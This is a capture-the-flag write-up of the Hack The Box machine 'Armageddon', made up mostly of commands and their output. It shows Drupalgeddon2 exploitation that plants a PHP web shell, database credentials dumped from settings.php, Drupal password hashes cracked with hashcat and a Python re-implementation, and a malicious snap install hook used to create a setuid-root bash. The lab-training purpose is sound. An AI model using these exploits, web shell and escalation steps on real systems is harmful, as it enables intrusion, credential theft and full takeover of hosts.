$ nmap -v -p- -A 10.10.10.233 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:26 EDT
...
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-title: Welcome to Armageddon | Armageddon
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
....
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds
Site inspection:

$ whatweb http://10.10.10.233
http://10.10.10.233 [200 OK] Apache[2.4.6], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.10.10.233], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.16], PasswordField[pass], PoweredBy[Arnageddon], Script[text/javascript], Title[Welcome to Armageddon | Armageddon], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.4.16]
The target runs Drupal 7 on Apache 2.4.6 with PHP 5.4.16 (CentOS). Both nmap's http-generator script and whatweb's MetaGenerator read it from the <meta name="generator"> tag, and robots.txt plus the directory listing below confirm a stock Drupal layout with the CHANGELOG.txt and INSTALL*.txt files still in the web root.
$ dirsearch -u http://10.10.10.233/ -i 200
...
Target: http://10.10.10.233/
[10:52:58] Starting:
[10:53:00] 200 - 317B - /.editorconfig
[10:53:01] 200 - 174B - /.gitignore
[10:53:05] 200 - 1KB - /COPYRIGHT.txt
[10:53:05] 200 - 109KB - /CHANGELOG.txt
[10:53:06] 200 - 2KB - /INSTALL.pgsql.txt
[10:53:06] 200 - 2KB - /INSTALL.mysql.txt
[10:53:06] 200 - 18KB - /INSTALL.txt
[10:53:06] 200 - 18KB - /LICENSE.txt
[10:53:06] 200 - 9KB - /MAINTAINERS.txt
[10:53:06] 200 - 5KB - /README.txt
[10:53:07] 200 - 10KB - /UPGRADE.txt
[10:53:34] 200 - 10KB - /includes/
[10:53:34] 200 - 7KB - /index.php
[10:53:35] 200 - 3KB - /install.php
[10:53:37] 200 - 132KB - /includes/bootstrap.inc
[10:53:41] 200 - 9KB - /modules/
[10:53:47] 200 - 278B - /profiles/testing/testing.info
[10:53:47] 200 - 271B - /profiles/minimal/minimal.info
[10:53:47] 200 - 743B - /profiles/standard/standard.info
[10:53:49] 200 - 2KB - /robots.txt
[10:53:49] 200 - 3KB - /scripts/
[10:53:51] 200 - 0B - /sites/example.sites.php
[10:53:51] 200 - 904B - /sites/README.txt
[10:53:51] 200 - 151B - /sites/all/libraries/README.txt
[10:53:51] 200 - 1KB - /sites/all/modules/README.txt
[10:53:51] 200 - 1020B - /sites/all/themes/README.txt
[10:53:54] 200 - 2KB - /themes/
[10:53:58] 200 - 2KB - /web.config
[10:54:04] 200 - 42B - /xmlrpc.php
Task Completed
http://10.10.10.233/includes/bootstrap.inc is served as plain text, and it carries the exact release: Drupal 7.56.
...
/**
* The current system version.
*/
define('VERSION', '7.56');
...
Drupal 7.56 predates 7.58, the release that fixed SA-CORE-2018-002 (CVE-2018-7600, "Drupalgeddon2"), an unauthenticated remote code execution flaw in how the Form API handles render arrays built from request input. Let's check whether this instance is exploitable.

CVE-2018-7600
https://github.com/dreadlocked/Drupalgeddon2
$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo MNRXASHW
[+] Result : MNRXASHW
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>>
armageddon.htb>> whoami
apache
armageddon.htb>> pwd
/var/www/html
armageddon.htb>> ls /var/www/html/sites -la
total 12
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 .
drwxr-xr-x. 9 apache apache 4096 May 28 16:46 ..
-rw-r--r--. 1 apache apache 904 Jun 21 2017 README.txt
drwxr-xr-x. 5 apache apache 52 Jun 21 2017 all
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21 2017 example.sites.php
armageddon.htb>> ls /var/www/html/sites/default -la
total 56
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 .
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21 2017 default.settings.php
drwxrwxr-x. 3 apache apache 37 Dec 3 2020 files
-r--r--r--. 1 apache apache 26565 Dec 3 2020 settings.php
armageddon.htb>> cat /var/www/html/sites/default/settings.php
...
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...
MySQL credentials from settings.php: drupaluser / CQHEy@9M*m23gBVj (the file is world-readable to the apache user because PHP has to load it, so any web-shell as apache gets them).
armageddon.htb>> whereis mysql
mysql: /usr/bin/mysql /usr/lib64/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gz
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj
armageddon.htb>>
The fake shell wraps each command in a single HTTP request to shell.php, so there is no TTY to keep an interactive mysql session open. Passing the query with -e runs it non-interactively instead.
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'use drupal; select * from users'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
The pass column holds a Drupal 7 password hash. The $S$ prefix marks Drupal's phpass-derived scheme (salted, iterated SHA-512), which hashcat supports as mode 7900 (Drupal7).
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
$ hashcat -m 7900 drupal.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Sat May 28 18:29:24 2022 (2 secs)
Time.Estimated...: Sat May 28 18:29:26 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 176 H/s (9.94ms) @ Accel:32 Loops:1024 Thr:1 Vec:2
Recovered........: 1/1 (100.00%) Digests
Progress.........: 256/14344385 (0.00%)
Rejected.........: 0/256 (0.00%)
Restore.Point....: 192/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
Candidate.Engine.: Device Generator
Candidates.#1....: alyssa -> freedom
Hardware.Mon.#1..: Util: 82%
Started: Sat May 28 18:28:48 2022
Stopped: Sat May 28 18:29:27 2022
The password is booboo.
Credentials:
brucetherealadmin:booboo
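hashcat does the work here, but it is worth seeing what mode 7900 actually computes. The following Python re-implements Drupal 7's $S$ scheme (SHA-512 over salt+password, then 2^n rounds of SHA-512 over hash+password, encoded with phpass's base64 alphabet and truncated to 55 characters) and verifies the recovered password against the hash pulled from the users table. It is an added example, not Drupal's or hashcat's code; the four-word candidate list is a constructed stand-in for rockyou.txt.

```python
"""Drupal 7 password hashing ($S$ scheme) re-implemented to show what hashcat
mode 7900 computes. Example code added for this writeup; it is not Drupal's or
hashcat's code. PAGE_HASH is the hash from the users table above; CANDIDATES
is a constructed mini-wordlist standing in for rockyou.txt."""
import hashlib

# Drupal's itoa64 alphabet. The 4th character of a hash indexes into it to give
# log2 of the iteration count, and the same alphabet drives the encoder below.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55        # DRUPAL_HASH_LENGTH: stored hashes are cut to this
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

PAGE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"
CANDIDATES = ["alyssa", "password", "freedom", "booboo"]  # constructed


def _password_base64_encode(data: bytes) -> str:
    """phpass-style little-endian base64 (Drupal's _password_base64_encode)."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """The first 12 chars are the setting: '$S$' + count char + 8-char salt."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return count_log2, setting[4:12]


def iterations(stored: str) -> int:
    """Number of SHA-512 rounds in the loop (not counting the initial hash)."""
    return 1 << parse_setting(stored)[0]


def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the hash of `password` using the salt and cost taken from `stored`."""
    count_log2, salt = parse_setting(stored)
    pw = password.encode()
    h = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):        # PHP: do { ... } while (--$count)
        h = hashlib.sha512(h + pw).digest()
    return (stored[:12] + _password_base64_encode(h))[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """Mirror of user_check_password() for the $S$ case."""
    return drupal7_hash(password, stored) == stored


def crack(stored: str, candidates) -> str:
    """Dictionary attack: first candidate that verifies, or None."""
    for cand in candidates:
        if check_password(cand, stored):
            return cand
    return None


if __name__ == "__main__":
    print("rounds:", iterations(PAGE_HASH))
    print("cracked:", crack(PAGE_HASH, CANDIDATES))
```

The fourth character of the hash, D, is index 15 in Drupal's alphabet, so each guess costs 2^15 = 32768 SHA-512 rounds. That is the Iteration:31744-32768 range hashcat printed and the reason throughput was only 176 H/s on this run. The high per-guess cost does not help when the password is a dictionary word: hashcat found it at Progress 256, a few hundred candidates into rockyou.txt.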
$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
ede8XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Now for the root flag.
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
We can run snap install as root without a password, and the wildcard lets us pass any file and any flags. According to https://gtfobins.github.io/gtfobins/snap/, snapd executes a package's install hook as root, so a locally built snap with a malicious hook runs arbitrary commands:
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
fpm is needed on the attacking machine to build the package (install it if it is not already present).
https://github.com/jordansissel/fpm
$ sudo gem install fpm
[brucetherealadmin@armageddon ~]$ cp /usr/bin/bash .
[brucetherealadmin@armageddon ~]$ ls -la
total 960
drwx------. 2 brucetherealadmin brucetherealadmin 111 may 29 10:02 .
drwxr-xr-x. 3 root root 31 dic 3 2020 ..
-rwxr-xr-x. 1 brucetherealadmin brucetherealadmin 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root root 9 dic 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 abr 1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 abr 1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 abr 1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin 33 may 28 16:33 user.txt
Now, on the attacking machine, we build the snap package that will be uploaded to the box.
$ COMMAND="chown root:root /home/brucetherealadmin/bash;chmod 4755 /home/brucetherealadmin/bash"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n aaa -s dir -t snap -a all meta
Created package {:path=>"aaa_1.0_all.snap"}
The install hook runs as root during snap install, so it makes the bash we copied into bruce's home directory root-owned and setuid. The trailing false in the hook makes it exit non-zero; snapd then reports the install as failed and rolls the package back, but the chown and chmod have already taken effect. --dangerous skips the assertion and signature checks for an unsigned local file, and --devmode installs it without confinement, so nothing restricts what the hook can touch.
$ sudo python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.233 - - [29/May/2022 11:15:15] "GET /aaa_1.0_all.snap HTTP/1.1" 200 -
[brucetherealadmin@armageddon ~]$ curl http://10.10.14.31:8000/aaa_1.0_all.snap -o aaa.snap
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4096 100 4096 0 0 46520 0 --:--:-- --:--:-- --:--:--
[brucetherealadmin@armageddon ~]$ sudo snap install aaa.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "aaa" snap if present (run hook "install": exit status 1)
[brucetherealadmin@armageddon ~]$ ls -la
total 964
drwx------. 2 brucetherealadmin brucetherealadmin 127 may 29 10:15 .
drwxr-xr-x. 3 root root 31 dic 3 2020 ..
-rw-rw-r--. 1 brucetherealadmin brucetherealadmin 4096 may 29 10:15 aaa.snap
-rwsr-xr-x. 1 root root 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root root 9 dic 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 abr 1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 abr 1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 abr 1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin 33 may 28 16:33 user.txt
[brucetherealadmin@armageddon ~]$ ./bash -p
bash-4.2#
The -p flag turns on privileged mode: without it, bash resets the effective UID to the real UID when they differ, which would silently throw away the setuid root privilege we just obtained.
https://linux.die.net/man/1/bash
bash-4.2# cd /root/
bash-4.2# ls
anaconda-ks.cfg cleanup.sh passwd reset.sh root.txt snap
bash-4.2# cat root.txt
a2e8XXXXXXXXXXXXXXXXXXXXXXXXXXXX